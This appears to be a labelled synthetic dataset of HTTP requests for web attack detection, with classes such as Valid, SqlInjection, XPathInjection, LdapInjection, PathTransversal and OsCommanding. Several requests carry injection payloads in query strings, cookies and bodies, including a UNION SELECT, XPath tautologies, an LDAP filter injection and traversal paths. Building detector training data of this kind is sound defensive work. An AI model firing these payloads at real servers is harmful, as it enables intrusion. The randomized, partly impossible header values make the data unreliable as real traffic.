Pragma: aebegm=nsri
Proxy-Authorization: Basic bnQ0ZTp0TGV0
Authorization: 1na1h Gtteeit=aekie5De
Range: 288-033,80242-026
Referer: /idta/Ulehodh.jsp
TE: trailers,deflate,chunked;q=0.3
Trailer: Accept
User-Agent: Mozilla/1.1 (Windows; U; Win98 7.5; o4-cn; rv:2.5.9) Gecko/25373845
UA-CPU: 68000
UA-Disp: 7723,577,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 108x957
Via: 3.0 158.219.74.134
Transfer-Encoding: deflate
Upgrade: ctieoL/1.3, oars/8.2
Warning: 328 182.117.115.208 "nRgge7dorgtiielaAlw" "Sat, 18 Aug 07 10:39:09 GMT"
X-Forwarded-For: 249.204.156.98
X-Serial-Number: 642382029635717
----: ----------------
~~~~~: ~~~~~~~~~~

null

End - Id: 8524
Start - Id: 48839
class: XPathInjection
GET /jrisMgdiv8tY/pfzleN7tajatesin.bin?mOiiurrcaoy=%27hreJ%7Ed9deo&ao6EFnsy=647&az=elYacdi%27++or+++++1%3C+++hf%2FyxoOy3%2Flq2h%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D579%5D++++or+++%27tisi%27++++%3D+++%27&84ppv5nt7WO=Ts2https&9tvodrvbh=83&qFtfaEAagra=%2Ft HTTP/1.1
Host: 44.199.115.109:80
Connection: neru
Accept: image/png, text/html;q=0.1, audio/*;q=0.1
Accept-Charset: iso-8859-2
Accept-Encoding: *
Accept-Language: ky-sg;q=0.0, zergrbw-t
Cache-Control: only-if-cached
Client-ip: 232.170.36.208
Cookie: ds=154691665;argtekrereru4=lpassthru=r2soesooe
Cookie2: $Version="856"
Date: Mon, 17 Aug 09 07:33:01 CET
ETag: W/"avJZH_WOE6_-E78DqOa"
Expect: 100-continue
From: w2h3rar@tkko9pi.org
If-Modified-Since: Thu, 08 Apr 04 17:47:07 CET
If-Unmodified-Since: Wed, 11 Mar 09 14:52:48 CET
If-Match: *
If-None-Match: "MYK_W5h39RoLIMb"
If-Range: "a94BlaFi9D5pQ4_"
Max-Forwards: 241
MIME-Version: 9.5
Pragma: no-cache
Proxy-Authorization: NTLM bmVpVHByZTAwRm5lZWNvZWIwc2hyU2pzQW5wZmV0cmVzZW9yZWFlZ2FPZXIw
Authorization: iuut ieiRnfr=Svncz
Range: 082566-8,-28,28-06636
Referer: /edlep/tNn3.html
TE: trailers,gzip;q=0.4
Trailer: Accept-Charset
User-Agent: Mozilla/7.0 (X11; U; Linux i386 0.2; kb-rd; rv:3.6.4) Gecko/80003608
UA-CPU: StrongARM
UA-Disp: 5906,9544,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 0867x2824
Via: HFm5le/8.8 113.71.180.99, fst/2.5 183.140.81.118:0991, FTP/6.4 224.177.93.123
Transfer-Encoding: deflate
Upgrade: qdiue/5.0
Warning: 633 188.14.137.244 "aosw5Aneiu" 
X-Forwarded-For: 239.247.179.124
X-Serial-Number: 177199337529573688
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 48839
Start - Id: 45043
class: PathTransversal
POST /lfMzCFvOYyg1MPPvCCAz.php? HTTP/1.0
Content-Length: 35
Content-Language: tR,gitEi
Content-Encoding: deflate
Content-Location: http://www.aicsNy.com/2odap/u9If/sMsnfut/zhi9/hxtlu.mp3
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 06 Jan 10 07:27:24 UTC
Last-Modified: Mon, 28 Mar 05 23:07:16 CET
Host: www.5ntnugDb.cz
Connection: keep-alive
Accept: audio/*
Accept-Charset: *
Accept-Encoding: gzip;q=0.5, deflate;q=0.0, deflate
Accept-Language: os5eus-dse;q=0.7
Cache-Control: k1t='3net'
Cookie: a8efse5=aGCzUz;aedTlbuftn=eST;nYei42oe=fueeJuhoIia;taysre7e=doc(file:///c:/ySt/parmHe.xml);mmt=79514902
Cookie2: $Version="74"
Date: Fri, 22 Dec 06 10:10:18 UTC
From: scvAet@hgiamatrfo.org
If-Unmodified-Since: Fri, 05 Nov 04 18:36:45 GMT
If-Match: *
If-None-Match: "YohPlS.0zUAtxDuLwer0"
If-Range: "31W4JwRKUekk@ti"
Max-Forwards: 51
MIME-Version: 5.3
Pragma: no-cache
Proxy-Authorization: Basic dGVyZXQ6ZWRiYTlt
Authorization: NTLM YWNMeHRpYWR0aXR0eGVlZXByNXRlcjFsZzRsU2VtcnVsaA==
Referer: http://www.winteiFL.st/2mheqo/ftebf.html
TE: trailers,trailers
User-Agent: Mozilla/3.3 (X11; U; Linux i586 5.7; ti-ko; rv:7.0.1) Gecko/92121859
Via: 7.6 www.ormrl.png, HTTP/9.3 38.126.59.139
Transfer-Encoding: gzip

jrs7erenr=borstdin&dUAcKntxp=434092

End - Id: 45043
Start - Id: 29535
class: Valid
GET /unsen4ohe/k4analbb/repnPgsNnhEN5ezaEb/aculoo2/s44euasc/ri2rtdbN.exe?sUtmoa9tysl8=l.54TX&gu0li=roRa7&ytan5eoit=atan9EneiaTr73s&ehp=neeisellhDalft HTTP/1.0
Host: 170.208.204.3:80
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=90
Client-ip: 199.216.21.216
Cookie: rroy=zuI;gend69tBvnre=991;XLtK=07;vC6Y4leRodoapl=4029691976;ivn2sdesUA=Ty;6iq0nI=3jg
Cookie2: $Version="080"
Date: Sat, 19 May 07 23:54:30 CET
ETag: W/"NDQW6P5-4Fw@IQFzmMn6"
Expect: 100-continue
From: rain@uiqt.com
If-Modified-Since: Tue, 05 Dec 06 03:36:33 GMT
If-Unmodified-Since: Fri, 15 Feb 08 05:10:21 CET
If-Match: "1haSlaTfTe5OGaE"
If-None-Match: "79ixNF7gDPl_MlwCFf-X"
If-Range: "7qpaX0g6.1o@YCyPPjqK"
Max-Forwards: 971
MIME-Version: 6.1
Pragma: rq='f'
Proxy-Authorization: Basic ZWVnMmE6dGllSA==
Authorization: NTLM cmxhbnRlZW1vYWVjbmJvaG1oMTluaGNlb3RudG51ZXI=
Range: 577564-305453
Referer: http://dsqen.uk/3eDcAu/gaeoI/3gn4aad/aynet/eyaha.jpeg
TE: deflate;q=0.3
Trailer: Upgrade
User-Agent: Mozilla/1.4 (compatible; MSIE 5.3; Linux i386; ebNDdeHt)
UA-CPU: StrongARM
UA-Disp: 496,778,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 3909x9569
Via: HTTP/1.6 5.42.195.65
Transfer-Encoding: tetng; oubnpere=esfTe
Upgrade: esen47/9.3, o2g/8.8, eeLM/5.1
Warning: 238 100.240.156.173:91606 "tbheEToeiftil5hig2" "Sun, 07 Nov 04 20:04:32 CET"
X-Forwarded-For: 41.168.99.7
X-Serial-Number: 935852027842714359
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29535
Start - Id: 33862
class: Valid
PUT /tBcf/PV0zsJrLs008qcopy/or1thyneuos/iNTiyJ4hc/a5ZsrT@bFBv9j/lomIwe/Jadmin@I8logJrpbZrcpnc1/fVO.telnet.HFwqYform.js? HTTP/1.0
Content-Length: 148
Content-Language: eorl
Content-Encoding: deflate
Content-Location: http://ahoo6s.ch/hib2t/r1wd/mloye.asmx
Content-MD5: ZTBkZWVob2UyaGRtaVV3cw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 15 Jan 04 02:11:26 CET
Last-Modified: Sun, 23 Nov 08 21:40:02 CET
Host: www.tnlmsoa2t.uk
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: iboeZ-Edarl;q=0.2, Lizcjt-tdal;q=0.7
Cache-Control: no-store
Client-ip: 172.17.143.228
Cookie: Eai04ep=5;0ueEEwstos4Uzr= oia)teopen
Cookie2: $Version="133"
Date: Mon, 26 Mar 07 21:15:16 CET
ETag: "fQ-1cn8ZVzi.yxkm"
Expect: 100-continue
From: tdove@2rii.it
If-Modified-Since: Tue, 07 Nov 06 11:43:58 CET
If-Unmodified-Since: Sat, 27 Dec 08 13:40:01 CET
If-Match: "gHk1_gMZq9No@-3kIG"
If-None-Match: *
If-Range: *
Max-Forwards: 851
MIME-Version: 5.9
Pragma: eOtlma9=oteiHeed
Proxy-Authorization: Digest response="b7A91bFAfcF18BAd62A7dc647bD5e17A"
Authorization: Basic b0VlZXhlMGk6d2ltZXU=
Range: -7,678208-80591,7682-2
Referer: http://www.eI5C.net/outahc/raSi/rjoPy9e/g6dvnc.php4
TE: trailers,chunked;q=0.7
Trailer: If-Range
User-Agent: Mozilla/8.9 (Windows; U; Win 9x 0.2; 3a-pn; rv:5.4.1) Gecko/07042062
UA-CPU: MIPS
UA-Disp: 260,747,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 1982x002
Via: FTP/9.9 www.on3wp0ni.shtml, 7.5 www.bodegwt.js, 8.8 67.21.22.72:76
Transfer-Encoding: i0or; oeeN=e2mls
Upgrade: dotrMt/4.5, 3ae/5.5, deeebe/8.6, ose4e/4.6, einu/5.3
Warning: 149 www.pnpgcar.gif:63794 "ttaegM" "Wed, 05 Sep 07 15:49:05 UTC"
X-Forwarded-For: 36.38.198.62
X-Serial-Number: 562812126143349
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

tearete6At8Sne=fitea&tpeenoj=04&S1OltacceptformOm=2758&on=iLsndtoxTdic3ep&eRkheIoi9loc= ti;gcnof&cd=dgw.&itedeaHrmas=uShsK8NU0zUH&Rhewhtehlmee=173

End - Id: 33862
Start - Id: 35381
class: SqlInjection
GET /uct6sogxate/xmtevnlmejsbysta/fdura/i41DNunf7FW/ejIoLiNTFyM0EVn_/p5qJx9-A-3lOSgC0L/libUydNVTMnullvpX/qIZd/ad/aoamoeeoeejh/cvebae.gif?Zse1odca=9rReg1etfE&5xooei=%27++++%29+UNION+ALL+++++SELECT++185++++FROM+++dageeRt7+++++WHERE+++++%28+++%27%27++++%3D+%27&s6lsitoc=00020&hjtlescnoiwo2=9529&utto0mctrNge=iQbrgR&enmbrdshnzt=0078260110&sn9etnRys5Ien=9&1srrpmenaito=5446963&sch=h-s%29&jni3rwe7=39228&vsrxsRaa8a=pdlsaaheroNeeitt8t&Oo1mA0it=668&ltEurenaohr=tiwuDhsem%3E%3Aih8vx5et&thnSahnt=i4Amrn HTTP/1.0
Host: 51.214.123.199
Connection: keep-alive
Accept: text/html
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: 2t-cnw;q=0.8, ohr-aet7ti1;q=0.5, juafxo-wrolnti;q=0.8, tat-nhtozn6o;q=0.4
Cache-Control: no-transform
Client-ip: 246.233.58.195
Cookie: 0p=tGh3etetuoh
Cookie2: $Version="49"
Date: Tue, 04 Mar 08 03:25:37 GMT
ETag: W/"YrySjLvL9c7uR21"
Expect: 100-continue
From: 0boosr3e@ftEeuLd2wt.it
If-Modified-Since: Wed, 24 Feb 10 24:50:18 GMT
If-Unmodified-Since: Wed, 11 Nov 09 16:58:16 UTC
If-Match: "VK6tZFF1ZfIx56bA3e7W"
If-None-Match: "_ta_Hv@G0GwGpEks@"
If-Range: Wed, 07 May 08 02:38:29 GMT
Max-Forwards: 58
MIME-Version: 9.2
Pragma: Qbd3hDeU=acrtaxe
Proxy-Authorization: wsul areisdr=nehaa
Authorization: NTLM aWFoanN0aXZlZWdsZXcwbFNnd2dlcnRycG90ZG1oVTJobmRuckVX
Range: 55-,0-,6611-
Referer: http://rrdohT.uk/hrvAedhv.mdb
TE: trailers
Trailer: Transfer-Encoding
User-Agent: h07sO1yCy http://www.4fuitgum.net
UA-OS: Windows 95
UA-Pixels: 177x860
Via: 3.7 33.213.144.25, FTP/0.0 235.54.172.154:9246
Transfer-Encoding: compress
Warning: 012 87.127.171.211 "neieAoyzeceydgth" 
X-Forwarded-For: 31.250.119.48
X-Serial-Number: 6475982437005855
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35381
Start - Id: 6310
class: Valid
PUT /fGnodeR1Of7N/p4laKi/e0odangdig/oM1DiPq5STQMYlmaI/lJGuA5lOz_a.Ai/d1S-aY96dStR/aoR/isbe/dAr.@78l5lC5MBVeU.asmx? HTTP/1.0
Content-Length: 192
Content-Language: ryweorrr
Content-Encoding: identity
Content-Location: /Xe8tnoH/sdoflx.jsp
Content-MD5: dWhuTnQ2b3RzRXBzY2l3ZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 18 Feb 08 19:53:27 UTC
Last-Modified: Tue, 04 Oct 05 23:04:19 UTC
Host: www.dte9jJi.com
Connection: htiewiTZ
Accept: application/postscript
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ni-aisEs8d, trhxoitr-e;q=0.8, Reilei-sies;q=0.9, e-peee, ttjele-nwol;q=0.8
Cache-Control: max-age=8
Client-ip: 79.115.102.49
Cookie: hndunq4n=cDu4~trr3epq
Cookie2: $Version="07"
Date: Sun, 01 Jun 08 11:36:09 CET
ETag: "-Zl8NTU7iqojl84mz"
Expect: mfrS5hN=dtneuo;dtrlecm5
From: 3ilmmBp@seiiyo.net
If-Modified-Since: Fri, 02 Apr 04 14:27:23 GMT
If-Unmodified-Since: Sat, 24 Jan 09 18:17:48 CET
If-Match: "5.w@OQbllvxajSVGDfi"
If-None-Match: *
If-Range: Tue, 17 Apr 07 22:24:41 UTC
Max-Forwards: 240
MIME-Version: 0.0
Pragma: iar8dt=lms
Proxy-Authorization: Basic ckxSdDY6MGxpaGQ=
Authorization: Basic cGVhcmUzbjg6dDRzcg==
Range: -9,4-
Referer: /syteIo/iin7/tpEss/6tsedye.tiff
TE: gzip
Trailer: Date
User-Agent: Mozilla/9.7 (Machintosh; U; PPC 8.0; ir-ea; rv:0.0.5) Gecko/83833021
UA-CPU: 68000
UA-Disp: 2381,870,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 679x627
Via: 3.1 72.151.51.230, 9.6 245.143.143.85:39
Transfer-Encoding: identity
Upgrade: 7nda/8.0
Warning: 623 137.176.166.196 "nmTcivtnt2saa2c" 
X-Forwarded-For: 161.237.188.1
X-Serial-Number: 3514931111660103
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

naloL=48484710&DFLTZn_0=recnm<stnhau|N&leEp=aneszomtdnepst&7Adrl=iwn&yaxcre=135278&Rss=57321323&tonh3pbeaAn2cn=Anelh4tTe8&FtEfei9ris=0011&owlrhmciiuntc=he7&VkJftpQcEd=cupdatehio&tr=Rr 8<

End - Id: 6310
Start - Id: 17982
class: Valid
GET /1.TM.xIkAqJ0P.pl? HTTP/1.0
Host: 226.90.181.29
Connection: close
Accept: image/*, image/gif, audio/x-wav;q=0.1
Accept-Charset: euc-jp;q=0.3, iso-8859-8;q=0.1, iso-10646-ucs-2, iso-8859-3
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 195.151.147.160
Cookie: 9CjpEY=294;sT8tilii8roifh=insertiis;fut=340837
Cookie2: $Version="07"
Date: Wed, 13 Jan 10 18:19:15 UTC
ETag: W/"v_bZgiUX_t931JyZ"
Expect: aereoiar=ndite
From: 3lhked@reen2i5.fr
If-Modified-Since: Thu, 13 Apr 06 03:27:52 GMT
If-Unmodified-Since: Sun, 14 Feb 10 11:15:17 GMT
If-Match: *
If-None-Match: "LIGHK4ng3xN9wpqJhxPB"
If-Range: Thu, 26 Feb 04 24:09:54 UTC
Max-Forwards: 860
MIME-Version: 5.4
Pragma: l1ikse='6'
Proxy-Authorization: NTLM cmVpeXNyYXlvZVRlczRpZWFFZWVPSG9lbGlvaW95YWZ1aWRub3I3Y3I=
Authorization: Digest opaque="Ihtgq"
Range: -44534,46459-4352,54-118133
Referer: /2iceeN/edpisSe/2BuwS/umcprfor/abe5oa.gif
TE: trailers,chunked;q=0.5
Trailer: User-Agent
User-Agent: Mozilla/7.5 (compatible; Konqueror/3.5; Win98; avseurg; nljinro)
UA-CPU: Sparc
UA-Disp: 8850,7638,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 642x5791
Via: 4.4 www.hdlz.htm
Transfer-Encoding: brutli
Upgrade: cnfwrA/0.9, une/2.8, wm5eaE/8.6, 5Anel/9.5, a2n/0.8
Warning: 243 www.t3moNn4.shtml:671 "6wh40ksieyhlBiAly" "Thu, 09 Oct 08 24:43:53 CET"
X-Forwarded-For: 104.233.139.60
X-Serial-Number: 861347769
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17982
Start - Id: 37550
class: LdapInjection
POST /e1K-YNAUnGQeKflU46/w9xp_W0yaiCr62N/gBNp.q@Ff85p.exe? HTTP/1.1
Content-Length: 184
Content-Language: wo
Content-Encoding: identity
Content-Location: /6kme/noeTon/cort/s0smkiC/nsaf.pl
Content-MD5: dHBvbzVodHJvaVRhdGJjbg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 31 Oct 06 15:56:33 UTC
Last-Modified: Tue, 14 Mar 06 23:41:22 GMT
Host: 190.174.41.246
Connection: close
Accept: application/*;q=0.4, audio/basic
Accept-Charset: *;q=0.5
Accept-Encoding: gzip, compress;q=0.9, identity;q=0.6
Accept-Language: *;q=0.1
Cache-Control: no-store
Client-ip: 115.143.65.85
Cookie: oinnwnomunes=icSz;zEer1ue=ouqtqes1TT95s;mpHe=cVYYAZrwfYF7
Cookie2: $Version="00"
Date: Fri, 05 Dec 08 19:23:02 UTC
ETag: "DKMeyFEGPC-DDbSpr"
Expect: ontekast
From: nIt1h@rvrs.org
If-Modified-Since: Tue, 29 Jul 08 03:45:53 CET
If-Unmodified-Since: Fri, 13 Mar 09 13:25:34 UTC
If-Match: "5HrHWNqt-vzBcgI8"
If-None-Match: "YP@y.S8NX6iOlAIr0"
If-Range: "OaSCl2XZAcNqtfde3N"
Max-Forwards: 273
MIME-Version: 7.0
Pragma: 3=htyeiftm
Proxy-Authorization: Basic bWZydGV3dDpvdGlp
Authorization: NTLM emxsb2Rhc3FjOWVuZHRiZGp0eVNpdHlzZGUxc2k0c3JSaW8wZXc=
Range: 0516-7855,069180-,334-
Referer: /shch8ss/mrcdnhz6/jsnft/renp/orlnheew.mdb
TE: gzip;q=0.4
Trailer: If-Unmodified-Since
User-Agent: mgMMribls0lnetxyTak
UA-CPU: MIPS
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 1680x065
Via: 2.3 249.212.199.225, 2.7 www.En8p.js, sitihi/3.0 www.pTheOc.jpeg:37553
Transfer-Encoding: deflate
Upgrade: Uzteet/0.5, dhot7e/3.9, dtjlO/6.3, Whr/7.3, r5he/4.5
Warning: 983 109.244.195.91 "L7Uqnd6Rnxrtrw" "Mon, 04 Apr 05 04:37:49 GMT"
X-Serial-Number: 749091
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

qowtIkez=enidstsintnt7&iettdtnzouuidlN=cmte)(&(objectClass    =rdEa*)&XgGpassthru@@qLY=varDg acwnn eMwgePa&HrandI=lib&Wx6insertP=7&hqs=tccnje&6yuE9d=5&smcaii6aisan=44177057

End - Id: 37550
Start - Id: 45514
class: PathTransversal
GET /uYsEg3rc/n3Fh4ns/eapmi/4-N@CXxyz6VI_/ezV/aerhsthso33r/deE5iCWVvhrjU./zoleLdLsgah6asiTcq2/2wE-KwBLHVM2JjC/iintbcrouuobanRntpe/oSE/ln08b7lhhgdSEhirt.mspx?stIu6upos=nDa&ncso=zna&samna=w%3A%5Cautoexec.bat&eroGase9r=eiqge HTTP/1.0
Host: 200.42.121.177
Connection: close
Accept: audio/*
Accept-Charset: euc-kr;q=0.5, windows-1254;q=0.9, windows-1255, windows-874;q=0.3
Accept-Encoding: compress;q=0.9, gzip;q=0.7, identity;q=0.5, compress
Accept-Language: *;q=0.0
Cache-Control: no-cache
Client-ip: 223.213.31.209
Cookie: pnd0lOhacesgh=0KvI;uno9sE10hnin=if pIeqanly];irketaoguett=rtrcoABGtnrpu8Nure;objectinE-1z=&;mm=L=bp'[-9;RRm_9=e lob
Cookie2: $Version="77"
Date: Sat, 12 Jan 08 08:41:42 GMT
ETag: W/"tUTgFd-kknaldZc"
Expect: altDi
From: t2hldl05@oephweoTmr.de
If-Modified-Since: Tue, 25 Oct 05 22:13:06 CET
If-Unmodified-Since: Mon, 27 Dec 04 03:07:40 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 12
MIME-Version: 8.4
Pragma: grckvd='ea3tyd'
Proxy-Authorization: Basic Q240c1A6bHNqZGRuZ3g=
Authorization: Digest qop=auth
Range: 55569-482846
Referer: /rCnp.swf
TE: chunked;q=0.0
Trailer: Accept
User-Agent: aCx95dpgole6tihao
UA-CPU: x86
UA-Disp: 9630,820,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 2096x915
Via: 4.5 www.irtI.tiff, HTTP/3.5 www.aaeh.tiff, aasipd/2.5 91.117.89.130:501
Transfer-Encoding: compress
Upgrade: hwrer/9.3, Fo0a/4.3
Warning: 336 www.pkli.gif "eE8hyyveresaci5o6et" 
X-Forwarded-For: 59.230.132.58
X-Serial-Number: 8223453
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45514
Start - Id: 35469
class: XPathInjection
GET /rLrluoetotseyenn/0aa3nnrnNaifyna8tene/oYpk1n.L/eptR_7UUJ@6S/mWy1RhBkIUTx/nb4uJ42Jfwig/tsyhspotIirinns2sH/vinclude/vZ/i21RmEOdb9Vl.ikTnU/tFck0T-hoSZu.mspx?lPFnull=e+&tf6ZH1wI=riCrWy&eughsfagsota=0%3Fa%3Cd+Meyi%2Bi&e7lz6Teiea=t8v%2B&ndpmVaFt=ao&6tthte1lah=n52g9DUjqk&na=positionttnaolns&eo=c6q1-o&agtop=a%2Bb%7C&sbmteoehs=heo8Fe9f&s2mVDZZ35pT=%7Cndn8ani%2Bpi+crs%3D3nn&i31oGSEtssrt=iperl-i8AnC%2Frod+d&tf=et HTTP/1.1
Host: 236.41.166.218
Connection: iDsicc
Accept: */*;q=0.5
Accept-Charset: windows-1250, x-mac-ce;q=0.3, x-mac-arabic
Accept-Encoding: deflate, gzip;q=0.2, compress, identity;q=0.2, identity;q=0.4
Accept-Language: ptsD-nn;q=0.9, ni-wtz96u, rtohnu-lml3, w-d3itieI;q=0.8, r5t6et-eme3o
Cache-Control: no-transform
Cookie: ttiia=n6t 1asi
Date: Fri, 05 Oct 07 11:53:20 UTC
ETag: "dFInZO7AAV.iTnAMyce"
Expect: miaNLadt=haay
From: stma@chhsenn.cz
If-Modified-Since: Mon, 08 Dec 08 14:23:10 UTC
If-Unmodified-Since: Fri, 12 Mar 04 21:46:29 UTC
If-Match: *
If-None-Match: "0ycONj4BbWQXqmG3G4_4"
If-Range: *
Max-Forwards: 4339
Pragma: sifA='92ie'
Referer: /esnqsr/taDmu/aqoeme.pl
TE: trailers,trailers,trailers
Trailer: If-Match
User-Agent: uonp/s/i/child::node()[position()=48]   or     'alyi5'  ='
UA-CPU: StrongARM
UA-Disp: 8678,966,8
Transfer-Encoding: identity
Warning: 084 www.rse4aa.htm "nhtTetlnisasnnesic" "Thu, 10 May 07 21:23:05 UTC"

null

End - Id: 35469
Start - Id: 36544
class: OsCommanding
GET /scripts/georgi.asp/..��..��..��file.ext? HTTP/1.0
Host: 37.93.23.112
Connection: keep-alive
Accept: image/*;q=0.4, audio/basic
Accept-Charset: iso-2022-kr;q=0.1
Accept-Encoding: *;q=0.3
Accept-Language: *;q=0.0
Cache-Control: no-cache
Client-ip: 213.233.54.110
Cookie: s2nbtiu6lee=n;1s91edlca9=7159233312;NqyCp=ed\irdivyai;zNteaien=ru
Cookie2: $Version="51"
Date: Mon, 03 May 10 09:56:03 UTC
ETag: "qAEfzWG5X7Zdf0i"
Expect: 100-continue
From: qslOdEWa@reveTya6.com
If-Modified-Since: Tue, 15 Jun 04 17:31:04 GMT
If-Unmodified-Since: Fri, 12 May 06 09:44:28 UTC
If-Match: *
If-None-Match: "mjNwGbHAxe-3M0DGNWp3"
If-Range: "CAXSyzgpnM7i0TN.51g"
Max-Forwards: 58
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: Digest nc=Ad95328B
Authorization: 2Sa3e 7aaa=sttdaoE
Range: 9206-,968-
Referer: /aolaneo.sh
TE: trailers,trailers,trailers
Trailer: Cache-Control
User-Agent: 4ausRal/0.3
UA-CPU: x86
UA-Disp: 1693,583,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 547x5195
Via: 8.7 www.yte1lalD.css
Transfer-Encoding: deflate
Upgrade: ildtt/8.0
Warning: 826 69.77.188.222 "hEdhtjuthB0Ezshecem" 
X-Forwarded-For: 149.92.182.203
X-Serial-Number: 55534835625911216707
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36544
Start - Id: 8228
class: Valid
GET /l2aw8eiAo/yy/rfb1Ixeb.QtiF/uGgsyccKl_QcCC@c1/mlritrasafmoHktb/Orm8n3-MEGYexec-R/riotafmtptodehfJ/gEamhaseeocako/gvNhsDG/l0wNt.jpeg?ueqbWset3r=+%29eIdocumenteno7q&7eelAnh4owM=%3Aservices&ueoOhtAag7d=1135867220&tEehqeRa=784493&cq6hvaro=dac8nmnoohu1F%3B+&uvd37=%40&oio4Cshadauigw=9320&iorreilqswEboh=8468&5Atatsanm3dSo=a&xnyjonbpdl=a2t&naueetmhnerkihr=%28%29e+m%5Dkaowd7sD&9ttbDiRg=Elx3&owerhrnm=ueytwmuniqiewrudh0&aifyEdinkh=m6 HTTP/1.0
Host: 49.96.229.242
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: hmgpe-n;q=0.9, edf-ttitloeq, 3toAse-sn, odnQ8m-alwnssnM;q=0.8
Cache-Control: eooDtg0=h
Client-ip: 30.130.64.241
Cookie: aZv-B14=53604;ANrnnanVee6bot=fCanaiaLeenen ;seocodoe3tieeMi=rVfBX39jYs;zdftaAlagiE=ehvfcvj1ys2
Cookie2: $Version="869"
Date: Sun, 12 Apr 09 24:14:05 GMT
ETag: W/"TiP..1vkx14ddc8"
Expect: 100-continue
From: wuDdgin@loei.com
If-Modified-Since: Fri, 04 Mar 05 07:37:54 CET
If-Unmodified-Since: Fri, 11 Feb 05 10:33:35 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 24 Nov 06 18:16:57 UTC
Max-Forwards: 74
MIME-Version: 9.7
Pragma: no-cache
Proxy-Authorization: NTLM U1JyN2VueWlVbnN3YnNsZWV1b3R1dGk2cmVhZWxIcm9FeW9kc2dsaWlucw==
Authorization: ccee V9emtoce=lrpi
Range: -164292,-5
Referer: /iq8jt/tpIs/i2Cs.tar
TE: trailers,gzip,trailers
Trailer: Pragma
User-Agent: Mozilla/9.8 (compatible; ei3iittajb; Solaris; iRe5hb6p)
UA-CPU: Sparc
UA-Disp: 260,910,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 794x905
Via: 2.4 www.Ihc0dhm.html, 4.6 www.7oYebkb.gif, 7.1 www.pweciiIe.html
Transfer-Encoding: iey5; ysneu=nhty
Upgrade: ib6Ex/5.7, aZse/0.7
Warning: 670 www.cs6c6t9.jpeg:59 "lmks8eesslpsErlnroH" 
X-Forwarded-For: 176.93.53.162
X-Serial-Number: 9806136470509307613
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8228
Start - Id: 31483
class: Valid
GET /iframeRZQFdjf3r/sgMR/bejsAWsL/mKqBf6WuwhHqS48-ua/zvXBDo-fQ/nyrMYTpEBb4T/Eosih/uu3o8tOWe8HIMae/nQuHI4H2hfbYgDMr/clg/hNJEWDCOuJ5.jsp?iapgieaqi96tk=2&Oas5obON=o%25eshutdownmrw9G%5Dmsl&ae6ye1lyc9ed=nXonih&glile=h HTTP/1.0
Host: www.xtcOrn.org
Connection: 9biifal7
Accept: */*
Accept-Charset: iso-10646-ucs-2, koi8;q=0.3, cp-936;q=0.1, us-ascii, koi8-r
Accept-Encoding: *
Accept-Language: awbs-tcs6Iiu, sn4Cd-2l;q=0.1, tateksKy-oleoP6z, pgepo-ocomhech;q=0.5
Cache-Control: sag=time
Client-ip: 242.224.6.251
Cookie: DdMWPSdSDkS=620038
Cookie2: $Version="85"
Date: Wed, 23 Aug 06 17:40:43 CET
ETag: "z5qe4Irdv2CK-uXQ"
Expect: ti5e
From: atcvh@odydfpeI.it
If-Modified-Since: Fri, 03 Dec 04 22:29:22 CET
If-Unmodified-Since: Sun, 27 Aug 06 15:58:18 GMT
If-Match: "4GFvSwfX5L82nOGFbeFH"
If-None-Match: "EEsQLw0vYX-c0D2pJMP_"
If-Range: Sun, 04 Sep 05 07:06:52 UTC
Max-Forwards: 32
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: Digest nc=Dbc2bcCc
Authorization: Digest opaque="o5tmz9e"
Range: 88432-49
Referer: /ehoazd/dtaiithe.nsf
TE: trailers
Trailer: Connection
User-Agent: iou1es (efZbN0.; aQUEPxKdk6; a5_Z4t86)
UA-CPU: Sparc
UA-Disp: 4970,305,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 484x1465
Via: FTP/6.2 www.seaerv.gif, HTTP/0.5 www.hr5oc.tiff, 5.2 www.eiyse.htm
Transfer-Encoding: identity
Upgrade: edf/0.2
Warning: 334 186.45.95.188:492 "4a7905aupt5ae" "Thu, 09 Aug 07 05:54:53 GMT"
